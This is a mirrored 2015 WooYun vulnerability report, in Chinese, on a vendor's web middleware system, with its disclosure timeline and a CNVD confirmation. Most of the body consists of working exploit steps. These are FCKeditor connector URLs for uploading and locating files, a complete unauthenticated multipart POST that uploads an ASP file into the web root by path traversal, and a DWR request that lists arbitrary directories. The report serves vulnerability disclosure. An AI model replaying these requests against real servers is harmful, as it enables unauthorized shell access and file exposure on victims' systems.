乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-27: 细节已通知厂商并且等待厂商处理中 2015-10-30: 厂商已经确认,细节仅向厂商公开 2015-11-02: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航) 2015-12-24: 细节向核心白帽子及相关领域专家公开 2016-01-03: 细节向普通白帽子公开 2016-01-13: 细节向实习白帽子公开 2015-12-17: 细节向公众公开
rt
部分版本使用FCK编辑器导致getshell利用方式:
http://url/fckeditor/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector
通过以上地址上传文件,通过如下地址获取文件路径:
http://url/fckeditor/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
案例:
**.**.**.**/**.**.**.**:8088/**.**.**.**:8080/**.**.**.**:8088/**.**.**.**:8888/**.**.**.**:81/**.**.**.**:8080/**.**.**.**:8088/**.**.**.**/**.**.**.**/**.**.**.**:8080/**.**.**.**/
还有部分版本存在另外一处getshell&任意文件遍历无限制getshell(无需登录):
POST /msciconupload.do HTTP/1.1Host: urlContent-Length: 287Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20120101 Firefox/33.0Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryV9A09McP8VWpvqkHAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8------WebKitFormBoundaryV9A09McP8VWpvqkHContent-Disposition: form-data; name="file"; filename="test.asp"Content-Type: image/gifYY------WebKitFormBoundaryV9A09McP8VWpvqkHContent-Disposition: form-data; name="systag"../wwwroot/------WebKitFormBoundaryV9A09McP8VWpvqkH--
登录中间件系统后,可任意文件遍历:
POST /dwr/call/plaincall/MdpConfig.getMdpConfigList.dwr HTTP/1.1Host: **.**.**.**:8088Content-Length: 253Origin: **.**.**.**:8088User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20120101 Firefox/33.0Content-Type: text/plainAccept: */*Referer: **.**.**.**:8088/mdp/mdp_config.jspAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: ZP_CAL=%27fdow%27%3Anull%2C%27history%27%3A%222015/10/01/01/13%22%2C%27sortOrder%27%3A%22asc%22%2C%27hsize%27%3A9; JSESSIONID=A4213A760A55F56CFF52A3517D549D6CcallCount=1page=/mdp/mdp_config.jsphttpSessionId=A4213A760A55F56CFF52A3517D549D6CscriptSessionId=A314EC2EA7AD1E43DE29854FA7443FC5853c0-scriptName=MdpConfigc0-methodName=getMdpConfigListc0-id=0c0-param0=string:./c0-param1=boolean:falsebatchId=5
使用c0-param0参数遍历案例:
**.**.**.**/**.**.**.**:8080/**.**.**.**:8088/
联系厂商
危害等级:高
漏洞Rank:15
确认时间:2015-10-30 17:49
CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。
暂无